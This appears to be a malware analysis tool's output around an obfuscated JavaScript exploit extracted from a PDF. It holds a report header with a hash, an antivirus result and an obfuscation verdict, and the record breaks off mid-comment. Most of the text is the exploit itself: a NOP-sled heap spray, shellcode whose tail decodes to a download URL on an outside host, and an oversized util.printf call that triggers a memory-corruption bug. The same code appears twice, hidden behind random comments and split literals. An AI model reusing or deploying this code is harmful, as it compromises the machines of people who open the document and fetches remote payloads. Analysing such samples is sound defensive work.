/*E2jNE14saliRxbVNe6g5HA7SV1MVJFU585HAt_tJlQbXsxlLsGFzHBHd2Ty_YH5VAAWuAE4lVU0CGjOyqTmxVtPLCDLbLEwL*/var/*C5MZczIGVGH7I8uTazgqZmrF9s76sv1ooCCG2LMLSTHaP2uqqQVE3CJzuFuc1kFdmIjdTwpmEwBUnw_SBVW5YgtIlckbCp6pyeHGPxsTiunLgndh91bVVJd8l*/ /*SosTSgxZmBLUVuE06klYHjNi5jsXgTa68INOo_nQBzlXjpVeP73*/G4q71l="";/*he1CMKoXd8MNuC3jzDoNMs0enG4rPB5HgtJs5xFWtRkdTcCHgrVsZTLBZEtpFmwlV6TPrYmapL50o7FJna3BuDDJHwyMYjyudH0KfkkKweIaZOjC*/
/*i7FMzqhIojOMxC4GoxX6nZ0z2J5mV0uQD7EudNYCcl1ed8HIYfCA6A1vJtXesHvwC1fgC4ieeX9HFEslHsfHiQRRow0vhuyWPTYI34mP1ij7mQgu9B2gRF66vqbfdxuwL3oDd45BbzorVXpWOKoW9jRsOsMsf8eqyHtR_nSbb7HxSxIg8x45WJml3zSWvwBj5v14XHUzCblVNu2KhuE44reugw*/
/*EiI1b5pUQxoF1FrKTbBe9vi2oPUYvGeBom2*/for(/*nqdm8zADdpmBGSITPhJUs6*/iCnt=128;/*GDYfGhm4UzR4nAWu_hOkHZVlhv_vUCZwFxQMU3EorWhTW5CVaR6hqQHNB*/iCnt>=0/*zVJYHPLXbfPgJ73qOOkRj_iehOvpcwxbH7zOLAmmf2Iow_U_N5Rx5zRbDBFgy387ywJ0wvlRmt7XsQX7KosDd0fhAkCzb_uPw5NioyzPhvnOA_JKo3OG2to2TqpvqY*/;/*ORN07ByLiizwjz7ucx0jnsMeA4Jviiu0199v0v8gTwS4kNmBAlkoSwISo*/--iCnt)/*wW8B9vVLWXQb2YH87eCOR3r3EEMnPZdNwZPtJk5g9K9yjFvfjyt2pZtud6WtUz8FNLyXvs5s42gc7R8fEpWuEFdhA1QUpMZ3XNPI7I2z_XQ7oMbt3yd847e4wuNa*/
/*RgZxSD3HIjSb_T68EdyssHFdOke3LU9r1WeIaVPi5i_42616YnnGvsj0RC2dXyKNKo*/G4q71l+=h8kt7x2qzDsYJkfd(/*GVwVSAo0KTbwQQxUtc7uiN43cZBxH7iCRUYjVCifV_RmPD79f2sDEl6h_8UH33JJMithkQC6PUhfYcc5TK8Yv36vyP3qHAzTji2Iy4DDNkilBAeVKbt6Top*/"%u9090%u9090%u9090%u9090%u9090")/*mST1hcvqSjqpzlTBCC51f1sbTlMDym_a6SPbuAHCjxrYYAaaDTQiJ9_cjLgXyfxsyCJhCQjmDQAcRa4UVMzyKovIi4WOMHhErvrtvRSZjEh3tz66nsFRdNqLGCaSJ8W2rDjcU3257YwpMrj1ZpG33xC9zcQ0Zm1FqYhAPY5Lxq1_WZzvD7m7sShHJggwVlbuIb_hVLUBATXaHIeCvZvZTSgcyBOJnq5wH4TcDndE72fC00FtY1IsIoK8pYFSD_DK3Wn70GA58g87fBp43xkAau8FICXMBbW5x_1wF2qCK02onugZTg1Dc6LeSYftvYguOR1E83ai1QMd_s4TNsXpnjI68oorCJbQaQUXIv70AHbAzTUCBrroQ1j*/;/*kM5gVUxwkGIs2Dr3LH4AbNCc6tGKjpWC2QiLkU9JbG3SKiKVqDVHQYjKGqVqUsN_lI5IHw_Cm6aPhh_PF0gIz_gnKtxyDWyoerxmdwoEqETNlTcrS0zH9UuIDg7G3uvWai94Tm8_q*/
/*uRkp94ox_mHtuKPqRHZCdzkbr5Co*/
/*x6GAfv0XYvWA4FuCUZUbyW6n7VT1Y9tH3zHWkGu02F0tLswfHF87b3iXN3Mlz6tru2DU8xSy4RgD_SjGXgBzXkLkbYLQT5*/iF3HUFMvuX=G4q71l+vN_t/*z9QWhlUrCajUkHf6xjQ6zoeMJUadBHo_Y_g0TMAuvVT32NpZejOHCO3LjSpkaSjySFxmSyVDJo6_3kZVJodL3VXanBACUk2mqnO9bjAkM7kEf_Zon31fMN61*/;/*q3jgtKLWYIx9JWKE8Ok7nNifDDsQ9hf5ZDaIOlenuQk4nu9j9helvCGyFyEDVj9vmX420WdsmClPxiyuESVzVbnaPrelPcV3zNsxkKeMNFb_nOurgFf2gHRw*/DOYD5yQFCY6Q=h8kt7x2qzDsYJkfd/*Nhx_imSGJIO9BRBO2j14jUNuw8pEkUMc2_bYmuew4st60vJ1T0s4S7mE3RJblV5bUVz7FSs9Aa3_LA1e_hXSc_WUQfw21qRKAGGFZyDaO6ZZ7O57w*/(/*vOQjigDUX5_oE_vKFJ9IjMD0l_Mf*/"%u9090%u9090"/*u44G3VpD2B2VzjI3sqdPgBggdy7WHpeAik34P6uQwEFUN8B52_JWBp3fcy2kcUk_5c4IWmZHqfc5cdySd8oelg0DTznvINvCpnLBOlJ6GlziDm1hjeAJ__NSy2D8Dz_tbKuqw4l3dZahBPDlEutD8B3xFy25yjV0SAuLlmp_BLBRPlAUUuXQwPD2D6u2eEzxFj9rLmrNyseDSfXmPv4A_82C3l5VqtHvRFbcsHqfzKiGp6Apm5pivsZVlvAT3wk9MCpUtKI4sPhn0bSkV9IFphbPRciJNIHaLwu584woITRGukrEhzKLVmbnD0xQH6rSqaMmT9QbQihAIOFqCQ2Y3SB6QzLYt3qZS3*/)/*A1RBG1jG9xLn1beNTwONCCZavRGJj0KKzcL6SvAPiM4XnXk7JzJM2jnm1uwZs8jgYvbqfb7CozaRMdWDNs7B7nzfyTrBYHAAWvr41MuWUAHIxeM_LHBHu1miJSjhakixVPpKbYhwZp5LIGLUNMb9CDfLWEtwpRi_gNK9lruAVnLeuWy8*/;/*b5mSZypegbJx_ITMSRy_AyUo_yXWmT63NkvBXrzpenAv6SUBq1DeMnqwEE8UX2SalTxRHcwzYxjTE4UvtXO6A6rE0oZWerwE_jWHBI7Z6fs0YCuGa0Ba4se3V4Nzk_5jjQrkYn0SHrRftAmJ0nj3VCtq78ff7ZEfp*/
/*fCXDUfulAd*/BM=20/*pnUzG1PQnOY8arNOqNB_2AUXZhSQuzaXIPe0eulsHiIzvWe0YezkCwrjD8T3Xq_nJ9G5jzAH8z4TT2rxqGEs3vR6ExFRxsavyUUmUbjJT4dJkP1qUhhEzcwZP2qBjGwWaF0vhi61bX_Anzr8WOAKqxj6oP8MVtjwyigVpKgxKha_NWVbXgHJFCyU0_qribfG81LXAsKLPkKd7g5TBBcGDPbCPGuMP5eEF3FyBRCmbfi9Z20bTFfighynRlKgfplkgrXi9aJY7rWVhUw1ZQY7yLiFxtlRXL244*/;/*p1okOkQk6y5roT8BPvNy1_gbR4nIwfWMUAwjlCIf1CLdWIfl5sZts6K_*/vgxlV1St03Nch6r=BM+iF3HUFMvuX.length;/*OHjSewnfhLFkTlaWw5s6YTyGthznryae7_wZvY5Sk_35kRPVK9QjRDq_kemRSCvNBhmx6gEeg7YFNnbYkr93un2UGdlZfVmh3OTxvXUmkPLbkNKQJGvoCJthzdl22pKWZwW3X9e8MpYw4iCCpxqr8ZOw41mtexE4jav7YO4k5QWxzYzeLfLI5LwOgesSjl2_VxXkp9d7UPvtEO6jZDcz9NCdsvwRVnQqZoPEmt_80vpC_kmZnDNkQQD0AzPWbgB1JR6vA6s_pXBp8nDkrRK9hN7hCL5dr6T1MNlNHSMxq*/
/*um3fMiwWgSkb1nmtFToZI2nuDvCPise0UVeg5P4Zhd1XFcFLwul6kNon0r*/while(/*zvHMBrvhvE5oEisDS4Jc2SBCV_oVMIPK5XX6DIcyMWcR5KVMCep4wq7Hpjc2srBlDYgHh96tUWANgVajzEbluXsY7JPn2RO6qvBMt77CS7QzQqYFuzqdLX3HhHvXY*/DOYD5yQFCY6Q.length<vgxlV1St03Nch6r)/*wVzWiq7KRv6DKn_tJXdkD0B_Bpyb*/DOYD5yQFCY6Q+=DOYD5yQFCY6Q/*fTpVgSx64d3uNekhlCI_iemFW2YIlwa2EFMB_gPcX_q3jNcmVcKzEPK6oTfZtWezjFLilbA0aq1_4SmOvxC1*/;/*xupgPEPmjEKoQtPrtOHZDHRWugHgiHYWfts0PlNH_vl1IrSN4D8d9hrmJpSCKrZqZGoos3wrmWhuDz9736Y1bEblutn6ZCkzIc2FNiskEco4ajvU8lvBBWwv_qJBQ9SaBkojROnu3gJaRdX3OZ5lKok2ylHwwmLxL1VdD0M6fVVxzsoDHioSLNI_zQvk38*/
/*Iwrgzqtu*/
/*JE85xl85Jl*/LMMOHzOq=DOYD5yQFCY6Q.substring(/*KDuSPdOKfhFvWWaubKiGouef3BnnYAmqEW0Tz*/0,vgxlV1St03Nch6r/*GbFPf57aENL0QVlPDunhTrfUqg_e86eYC1ohuj9ywIxCdXShUDbmjvSEvxBpQasGDO1nMoZUabyxtV5oZVQ9FjC1VEfmeMsibiKnLk9lAwYtGSXgnodtMgjilDJEP3nrZyTkXRLXCjGJ2epeIIMUov4OyBTD48vRuE3HVCfWmhdGM8OUIj04bNrcgvVdfnNjeU6h1SIb1mhBiwWqUUjviPNEAihfKuEpE0M5RVVG84IeoeJ9zttX97*/)/*dd9eosiTwhfqy1A6w4CPghZeWHMuFHKDlIhP1FimmCSa3SVoLY4r7SKSZXBffLiFUFVKK4wx7DNxWiah8TO3lYJAwKfQWDWqIr2TkmGfqUSC4tjzBxqnL1n8_INWL*/;/*PwrNS8Rhi1lte2buiK9qjBy2XhWfD6clqJy9FEfo6GWZ9yIg9FLgG0Wegt_jnbJSk8QpBv*/
/*OzUTnkEMcAifwPBl7uUFyYCrKooExPPHDjbqJf3lfaF*/xktOqvnkBrtOrbJm=DOYD5yQFCY6Q.substring(/*oTukEF7ezWpXdSH9y00alWbNCfjAzYNSr83wCyQ2J6NnMUkATib663H8Xr9LEKe*/0,DOYD5yQFCY6Q.length-vgxlV1St03Nch6r/*ZUP4n1rULDmN7VwuWja_vPnrPv5m8doQtg5iBn4MrfZm1LWMvxLfBzMRjF4gjhxRCq1ETsQ_MqmB39NmuZHwNTDxZ7S9cFOfvDkEw*/)/*T9gp_YnNA*/;/*L2pVzcdUajg8peSJABIjokt7JqLzs8Hoxw_mOd7pBblr752760fiiOds6phmloQYaP_pt7TuW5bSxROrQuPy9tg3XCe0quXG_XvsSEcp948vJLca6rN3auuywIG3l2LrpkuWvX_zKODRSns9wN1WsPc_6j2gaCMEn7aXTaLdpPu84c5opuAX_dX5CNZcQmg4h8P1WbTArC9jf3NfOikr6euI5LYfsQCog4_9LAoO0Nt1a5bpbAVWfEeYQ459J8lpzln_mQNle8a522iS35oX0IwPAqMJmzaZbaBsomLlCFb5ouwiYIhg5whk0rLxgmM9BNqq13Q38swlbhJ1prVjd4IbkUOF7aC9osnek5VhlGHCnR3S9N3aFA3pUFvQgyNJg2nF*/
/*tmUFuXtAOB9c4Yi5PNOV9e2vsARioWRn9msr0bsNcqqVDNOTadoY9fJpgaNKxfxuGfbF7JTXz0s4M8Mma2AXVKB3kPBWuyG1Si7NrPlgNTZZQlBqbCCxMEoxTpJCdP*/
/*Gyz0fDkAQ4ZqJ_szau2M762tOf3Q0GIu68sZASZQLz8UzoIPY_cU6SCIy5ZwAif6fNTfftvrisAWWJluJDDDVFMI_l6_IZ5nnM*/while/*RWhJJx_TsN76if62D*/(/*R9N56kk4wpCPbKl9UuvTCch0XEeR7hnrf1laaLSL1VbQfCOzx_I1cqyzuRGqytXSj9t_IAK0VmP1oepadyP7dDuMU24IkPbJNJI*/xktOqvnkBrtOrbJm.length+vgxlV1St03Nch6r<0x40000/*cHJ1aMmzI6wl_AFvEqz2g4yBhyaKAainhrc94ExB_im_jsuoXje4bS60FUIGvqtSXLPQQBRPk5PJl0x0*/)/*s20jw8oFFv2wdIIpYY6ZqK_jZIJY7I7M06wuT74zdlzz80aqHduKzzPy93yGRru553Czv2SVqHSoh9vAs7zgSxUQoHW7zF1s93hsszDY7VBdTweArSh_F3Pt_loyrefpVCXD2abxwcPEOtF7Bm6GdJ1dveQc9wHSyeWp5xbpPqudZzYab*/
/*S6dWXO1nqxZxFNRb3KNS1c0j7XYTyznUtFrFTgt_THxYVD1MODfDfdnb2AupzX_icqnvM*/xktOqvnkBrtOrbJm=xktOqvnkBrtOrbJm+xktOqvnkBrtOrbJm+LMMOHzOq;/*Vc8Ji8gTozXFeV0bFImiigPvYpfHcQVOsSXQO5j3t89MR7nXDP6lvJWIy2QQHlez52EHuo_dk8p24SO7hIhSS5bGvrW3S1rLqvTazgeh6zluAzxg3S0et1fdeT1d3RJfCW2y3VUwJ6gKtSqlkpFTekw05lcv4mP79GtzbDll9GvrZbS_FXSk8Di2pAlim2ej8MYYQSOFu6eLMdRkw2g1ZWfa9DByhlvu0J_0IND4IiDVBV6xLbnlyHBvKCjrnUbmealmoofwMjGO5BBFcorPwsA7uknX5D_YekAHOf4bE_p9AqCcUusFbtBLSoiMsikLHlT*/
/*SLxJLbHLHKoc5*/GWn=new/*eF6YpmwL6MF2VTE0TsPUh1rFfCku0cGdiB2MnnYizeZJxeIFLYatOHztKYdI1klYzkNE0w5cKDPoMV1kwiz5XiDvALllw0LNjZSiKLAUPQ9blyBXV1QsXTdYeEFDKenjwKt9LDMbBnBzoYKep439WQcaPteZM*/ /*r9Ss6dvH5xu7lYUv40ou8_AYaPH6oTBnRTUMwETq2Clcb6NT52D11DOQTVK9oLk7f5HQ9a8zdhQ6cdOVURLJVZaovklYwKUQDbhB3d1UAGOckcy5u0DFYdtICUhzf*/Array(/*BTUe6jUjC00gwObORLblo18Kqtoz3SMPMm7XmewvoKqwG4vApf3EVzOAi31ZKCpXokuPEgAsqqe*/)/*qOxNuoSEdgFAY6Zj8D7lop2sK2Z2g5nFIZT3Dl7gHBhg78E4A_dopTV1JvqqoTwxsEovpkRxlr4_Pi1H1DDXMlpeeFlOx8FFwwRchk484w7ITwPJVgB5LgYRGmDCsJzeaQBAI9555BNpRWek4geEB4VIeMMi_r0Ps0Yq3Sj5gOK4svvN*/;/*gPGLXlkiyIheHxMFL49ec2_qB3YwnmAd3GoPsNxgWUAdHMjSFhxhYxNZpmKROKuFRXU_lHf8bfais02xgoU5aiSEKdWYoGd7ey6E6aBW6b6*/
/*iUEjfWMDi6lIFstZEzk20vRF8ZPl2I8YcA89XJA6ElDKTwjXlINj5fo265bwCXKfYGcvQc*/for/*TtmjJvwT4HcLb7G_PpCOniA3_OIKquM_dzinjT7ba*/(/*E2Tt2jX4xAbx4aBAlsvyrNmO1Kiwm9IOzc9qAVjyWAlOamOBT01AMbOBmwyOu7djXaOYwyLHywVOYjPsi*/QAU=0/*Pwa7Zu11SI6clQ2PWTK1HF6Cf7YaXSCyEcudMjTfrN8Sdxh1GspOykQ*/;/*lot48wqAOaea0x7q_49cqfSwM9A_hQSC6B63xl3AAVb0IWoHPmk6G3qTzrTW8lY3nS*/QAU<1400;/*b5la5824ENhMcIxWPoCjdu31rdNiFgQeZ26SxwL30tDb31yGe2p9k*/QAU++/*NhvWZvW3YALu1UegAIzw6g1jRfIjRuXkQH7q3Si*/)/*Yt_ICdoDldzg_oEQJNzb9LAOT85KObahKZqN4TQMDtfXfDuGM9pGdT8XNYJPwTuKaL6qokAsTfEzjz6vwk2rynFMwV9EEHeQCK5nLl8qqvPeq_QP2fHpIN25jz9n8c40mxmxYidDSti9szMjTUNciEVG4TuzvnyXZZKy8o3PWZMDNZnhu10S6UZxnImYvavKz70wjL6P*/
/*UdnlAXb_pVTDI8MuU8JFH0AFuk7veK0comCo0ennz7r834rM11R9zSCi30TWJSyx52a3UDfJ0LF2DwD5mV2an50f4R2BjpycfNU1Qz0P_DGD1J9cfy3Hs1nkHelrI*/GWn/*gzzJe3AJDMROq6Wvt*/[/*BtgErhpK7Nv1u4oiBIZCSdPkr6eCqNqU7MYmtDxpQheAaIjbR9djbtIHnnKT12nwCBYwFKaVs6WHC6jU4C4Tv*/QAU/*GYolrdbUPeWnPbxqxflImoCK97N2P93qVgRC_tWOMs2cJoI7ItDvWG6UBiRFC8biNdh81wJimlrPumYdK1wDJyLTERWBs5OKbLA*/]/*Jiy7PDp2cHgk9RoGFzaJFwKypZ0Fk0S6hF1wJemlmI*/=xktOqvnkBrtOrbJm+iF3HUFMvuX/*CQ__zEfEj57dMtOYlNGop0edE9Tu75QsKQs0VND5H0XUsmsS1z8exa83YQmTJ4BTIuRe8VXDTvXBXFUM6QqrrnjE4KYCDZWMJnqF0*/;/*eSygTKmnWg5CNkqxoi9C*/
/*Anmdd4RbIRfPVVZSx5Fo*/var/*kjRlkIEadEh*/ /*nGKV_5TD0rgszjBWXhMbFeCqnHFFLmxtt8Dt2XwzDRh41jONFbpK6r1hy7m_iZtQWw_NI*/bUJR8tSnc=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;/*wc*/
/*zeoYlH0SPXb4_5V4LwAdRPymoFYhLCi0gMWHTVZjt1bsuxk7jlY11LceR1Bc4kbYwyfFI5p2uGje4IZctxSj0uDPkFscpI2b8VhFPL8*/util.printf/*pvg7xIskWbfzA4POQABcHzNcClBSTkXAU58HCorYFMNGEdUVeWxlLADOmFh6q57Ay3H1gyOm_csE6CaYYN_kNCyzIVu*/(/*npyCh73DtFpthXxcZN1yazYn3McAhMy*/"E000f",bUJR8tSnc)/*bE_wtEC3S2TPCTeVPXgez7B_VrMNAcrxhqiPvkHCbaSeuw1_JVe0Rf9mLJzLmg9IMgX8Gf_i7RBpD2pMMIKdnIFzR5_4Z9AleYik5*/;/*Flk3qi611tWI59wPepSsP9e5gb7*/
generic_stage_recovery_002.js deobfuscated-js generic stage recovery split-literal-normalize -> percent-decode from JavaScript object 6 at offset 0x179 12972 bytes
SHA-256: 12d2c33fa072ba96d04b84b559f1e011e299663a6f5dd802950bdeed84b66062
Detection
ClamAV: No threats found
Obfuscation or payload: likely
100 of 115 identifiers look randomly generated (e.g. 'L2pVzcdUajg8peSJABIjokt7JqLzs8Hoxw_mOd7p') — consistent with name-mangling obfuscation. Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var /*JfdKo3nWp67oo_4OEkruthLp3tuH5qGLLjWzb0*/h8kt7x2qzDsYJkfd=function(/*lNe8cKjUj5d_K4HoXWuh9W2uznFEBDe6Q92sHZCrTfqdYyGwJ2SHNJ2Bx8Fz_kuPhl9pAAVTgBx5z4q0u9G8H8065Eu4odILDG1DGKWnLIgABL0wJF*/YMRwf_vXNM5H4yF)/*gmxYipcQvH_Rewu5_jrZYEBQQeQyqEiirV8OAYfvfeC0Qw3PVjotoq_6KQs2VQYBmUQmsvWNPYMfKEvfnZNRENLPd5FyJe1vyFWg2ttFH7lR_VwXazqfnFpt31ggOemzd5u__jvJDXupf6O6t5aW0EF15mWIG09j4ri4PSBSqv9KqLFZFgwEk26e*/{/*fniPkHIRpAg9Bznxxyd043DYnH0eBd8SFfiq*/return/*E4GthFmwKMc570*/ /*f2yU9sAE4LoP_EOKKHQ5pWgags3an1fNrSio_it4tWIsbW3ldIfHeAhAtZaWP7j7OGkOoSGXpPEF*/unescape/*CCrL7w6zaY8lbDafKk3xwATxCfwyp2g74NHy0*/(/*MZbj_3nZXx_OkwO4iQYTECJk0CyG1wIcLkAKbnkzakC_VR45iRNmTWMSY_YOwhq8GqGiTrWtQZtmrmf*/YMRwf_vXNM5H4yF)/*F_5zMFEq0JdHnT3bYO8P9qVEl7VlRHNBGG2TL60JEcRrvJIJYEYVvtZWpv884J90QyRctQmxs4ecBmmaqAvbtKxY7uUy5SxJ*/;/*bRcmU0G2EHiBf856_w5gtY_ASY4Bk5C0KekfcrWgz5iU2bP1MIV7*/}/*A8RrdOsS3fEp9Di1G8dO69QY5jdZGJAxFRdjgL2Xr7Bp0jeFf9Ua6lzyJSMQbNDhfgFAs8YY4ZC30h9eeR6Y3tMB*/;/*F7zty2Sr4Q3W2XzitVWm4rdU7ShDock0XZrKQ_3IPufG*/
/*EXCn0mfpKae_I1IBx5RRjk0yhcsD4nKUAN901co_3H0A8GCuATAk5_Yab*/var /*wqEEKMjLuj5I_PX7zTJ74XkLe81tA6T9lYBvkk8TJ1bJFzE5INzAlZMEVByW7GThfVRE6OXEDzNJoRCwf3xFQ0Km_997ERcjmuoh9AlB1yKeFNPkFBqWA29Az*/vN_t=h8kt7x2qzDsYJkfd(/*js2MEDedC3rzZXvfD3DWiZFzzzafa6vTmmgrp_Js32gRNRwQIzmrOsfDg6j8zTQb6wIjwRQoHx6VDqlMfN4u7XxcRVZGopijbqHN9Y2FKvaObBa8OS*/"%u9090%u9090%u0"+'feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%'+"u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f"+'3%u9f64%u6ee7%uef'+"03%uefeb%u64ef%ub903%u6187%ue1a"+'1%u0703%uef11%uefef%uaa66%u'+"b9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca"+'87%u105f'+"%u072d%uef0d%uef"+'ef%uaa66%ub9e3%u0087%'+"u0f2"+'1%u078f%uef3b%uefef%uaa66%'+"ub9ff%u"+'2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%'+"u6615%uf7aa%ue806%uefee%ub1ef%u9a6"+'6%u64cb%uebaa%u'+"ee85%u6"+'4b6%uf7b'+"a%u07b9%uef64"+'%uefef%u87bf'+"%uf5d9%u9fc0%u780"+'7%uefef%u66ef%uf3aa%u2a6'+"4%u2f6c%u66bf%ucfaa%u10"+'87%uefef%ubfef%uaa64%u8'+"5fb%ub6ed%uba6"+'4%u07f7%uef8e%uefef%uaaec%u28cf%ub3'+"ef%uc191%u288a%uebaf%u8a97%"+'uefef%u9a10%u64cf%u'+"e3aa%uee85%"+'u64b6%uf7ba%uaf07%uef'+"ef%u85ef%ub7e8%"+'uaaec%udccb%ubc34%u1'+"0bc%ucf9a%ubcbf%"+'uaa64%u85f3'+"%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue"+'7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%u'+"bdb4%u0eec%u0e"+'ec%u0eec%u0eec%u036c%ub5eb%u64bc%u'+"0d35%ubd"+'18%u0f10%u64'+"ba%u6403%u"+'e792%ub264%ub9e3%u9c64%u64d3%uf19b%ue'+"c97%ub91c%u996"+'4%ue'+"ccf%udc1c%ua626%u"+'42ae%'+"u2cec"+'%udcb9%ue019%uff51%u1dd5%'+"ue79b%u212e%uece2%uaf1d%u"+'1e04%u11d4%'+"u9ab1%"+'ub50a%u046'+"4%ub564%ueccb%"+'u8932'+"%ue364%u64a4"+'%uf3b5%u'+"32ec%ueb64%ue"+'c64%ub12a%'+"u2db2%uefe7%u1b07%u1011%uba"+'10%ua3bd%ua0a2%uefa1%u7468%u7074%u'+"2F3A%u642F%u7077%u72"+'6F%u6174%u2E6'+"C%u7568%u702F%u6F72%u7267%u6D61%u752F%u647"+'0%u7461%u2F65%'+"u646C%u"+'2E72%u6870%u3F7'+"0%u3D69%u6C73%u"+'596C%u4A63%u'+"4D34%u652"+'6%u703D'+"%u6664"+''/*ZlzUNlBFF*/)/*rrFhWFSyzckNYUiLNWozpAbir53nMYr11QyNqfY7ePEu0j1F4e5ieUFLO9yNePLvDZbixWBCavB_lG4EAajVgujei_1CPBxSaN2Nk4PAo*/;/*JOX4SXT3szlRSJQILfJ0yjMowwgBxKSxYpprB9iuxJAFSQNewWcj7oNrZttM5A0Rqn0slhbXqbc0spceA5C7hPn80WJ3WHJBvHtVoKsUmKST1vx1o1wLFZIDvR7HZEJJJUtoou3ltrDWq6dp7Zw9JxRKWKJull1F6jtiSlJARMW8HzmCOXAYJSigcrQDRFIz3u8c58tFSqMHRPWpQuziRUA0lDPqLbUCLQfENNJf5WnLm023tpa__a9keNQpols13M5EaDjTaMeBLU55_U5*/
/*E2jNE14saliRxbVNe6g5HA7SV1MVJFU585HAt_tJlQbXsxlLsGFzHBHd2Ty_YH5VAAWuAE4lVU0CGjOyqTmxVtPLCDLbLEwL*/var/*C5MZczIGVGH7I8uTazgqZmrF9s76sv1ooCCG2LMLSTHaP2uqqQVE3CJzuFuc1kFdmIjdTwpmEwBUnw_SBVW5YgtIlckbCp6pyeHGPxsTiunLgndh91bVVJd8l*/ /*SosTSgxZmBLUVuE06klYHjNi5jsXgTa68INOo_nQBzlXjpVeP73*/G4q71l="";/*he1CMKoXd8MNuC3jzDoNMs0enG4rPB5HgtJs5xFWtRkdTcCHgrVsZTLBZEtpFmwlV6TPrYmapL50o7FJna3BuDDJHwyMYjyudH0KfkkKweIaZOjC*/
/*i7FMzqhIojOMxC4GoxX6nZ0z2J5mV0uQD7EudNYCcl1ed8HIYfCA6A1vJtXesHvwC1fgC4ieeX9HFEslHsfHiQRRow0vhuyWPTYI34mP1ij7mQgu9B2gRF66vqbfdxuwL3oDd45BbzorVXpWOKoW9jRsOsMsf8eqyHtR_nSbb7HxSxIg8x45WJml3zSWvwBj5v14XHUzCblVNu2KhuE44reugw*/
/*EiI1b5pUQxoF1FrKTbBe9vi2oPUYvGeBom2*/for(/*nqdm8zADdpmBGSITPhJUs6*/iCnt=128;/*GDYfGhm4UzR4nAWu_hOkHZVlhv_vUCZwFxQMU3EorWhTW5CVaR6hqQHNB*/iCnt>=0/*zVJYHPLXbfPgJ73qOOkRj_iehOvpcwxbH7zOLAmmf2Iow_U_N5Rx5zRbDBFgy387ywJ0wvlRmt7XsQX7KosDd0fhAkCzb_uPw5NioyzPhvnOA_JKo3OG2to2TqpvqY*/;/*ORN07ByLiizwjz7ucx0jnsMeA4Jviiu0199v0v8gTwS4kNmBAlkoSwISo*/--iCnt)/*wW8B9vVLWXQb2YH87eCOR3r3EEMnPZdNwZPtJk5g9K9yjFvfjyt2pZtud6WtUz8FNLyXvs5s42gc7R8fEpWuEFdhA1QUpMZ3XNPI7I2z_XQ7oMbt3yd847e4wuNa*/
/*RgZxSD3HIjSb_T68EdyssHFdOke3LU9r1WeIaVPi5i_42616YnnGvsj0RC2dXyKNKo*/G4q71l+=h8kt7x2qzDsYJkfd(/*GVwVSAo0KTbwQQxUtc7uiN43cZBxH7iCRUYjVCifV_RmPD79f2sDEl6h_8UH33JJMithkQC6PUhfYcc5TK8Yv36vyP3qHAzTji2Iy4DDNkilBAeVKbt6Top*/"%u9090%u9090%u9090%u9090%u9090")/*mST1hcvqSjqpzlTBCC51f1sbTlMDym_a6SPbuAHCjxrYYAaaDTQiJ9_cjLgXyfxsyCJhCQjmDQAcRa4UVMzyKovIi4WOMHhErvrtvRSZjEh3tz66nsFRdNqLGCaSJ8W2rDjcU3257YwpMrj1ZpG33xC9zcQ0Zm1FqYhAPY5Lxq1_WZzvD7m7sShHJggwVlbuIb_hVLUBATXaHIeCvZvZTSgcyBOJnq5wH4TcDndE72fC00FtY1IsIoK8pYFSD_DK3Wn70GA58g87fBp43xkAau8FICXMBbW5x_1wF2qCK02onugZTg1Dc6LeSYftvYguOR1E83ai1QMd_s4TNsXpnjI68oorCJbQaQUXIv70AHbAzTUCBrroQ1j*/;/*kM5gVUxwkGIs2Dr3LH4AbNCc6tGKjpWC2QiLkU9JbG3SKiKVqDVHQYjKGqVqUsN_lI5IHw_Cm6aPhh_PF0gIz_gnKtxyDWyoerxmdwoEqETNlTcrS0zH9UuIDg7G3uvWai94Tm8_q*/
/*uRkp94ox_mHtuKPqRHZCdzkbr5Co*/
/*x6GAfv0XYvWA4FuCUZUbyW6n7VT1Y9tH3zHWkGu02F0tLswfHF87b3iXN3Mlz6tru2DU8xSy4RgD_SjGXgBzXkLkbYLQT5*/iF3HUFMvuX=G4q71l+vN_t/*z9QWhlUrCajUkHf6xjQ6zoeMJUadBHo_Y_g0TMAuvVT32NpZejOHCO3LjSpkaSjySFxmSyVDJo6_3kZVJodL3VXanBACUk2mqnO9bjAkM7kEf_Zon31fMN61*/;/*q3jgtKLWYIx9JWKE8Ok7nNifDDsQ9hf5ZDaIOlenuQk4nu9j9helvCGyFyEDVj9vmX420WdsmClPxiyuESVzVbnaPrelPcV3zNsxkKeMNFb_nOurgFf2gHRw*/DOYD5yQFCY6Q=h8kt7x2qzDsYJkfd/*Nhx_imSGJIO9BRBO2j14jUNuw8pEkUMc2_bYmuew4st60vJ1T0s4S7mE3RJblV5bUVz7FSs9Aa3_LA1e_hXSc_WUQfw21qRKAGGFZyDaO6ZZ7O57w*/(/*vOQjigDUX5_oE_vKFJ9IjMD0l_Mf*/"%u9090%u9090"/*u44G3VpD2B2VzjI3sqdPgBggdy7WHpeAik34P6uQwEFUN8B52_JWBp3fcy2kcUk_5c4IWmZHqfc5cdySd8oelg0DTznvINvCpnLBOlJ6GlziDm1hjeAJ__NSy2D8Dz_tbKuqw4l3dZahBPDlEutD8B3xFy25yjV0SAuLlmp_BLBRPlAUUuXQwPD2D6u2eEzxFj9rLmrNyseDSfXmPv4A_82C3l5VqtHvRFbcsHqfzKiGp6Apm5pivsZVlvAT3wk9MCpUtKI4sPhn0bSkV9IFphbPRciJNIHaLwu584woITRGukrEhzKLVmbnD0xQH6rSqaMmT9QbQihAIOFqCQ2Y3SB6QzLYt3qZS3*/)/*A1RBG1jG9xLn1beNTwONCCZavRGJj0KKzcL6SvAPiM4XnXk7JzJM2jnm1uwZs8jgYvbqfb7CozaRMdWDNs7B7nzfyTrBYHAAWvr41MuWUAHIxeM_LHBHu1miJSjhakixVPpKbYhwZp5LIGLUNMb9CDfLWEtwpRi_gNK9lruAVnLeuWy8*/;/*b5mSZypegbJx_ITMSRy_AyUo_yXWmT63NkvBXrzpenAv6SUBq1DeMnqwEE8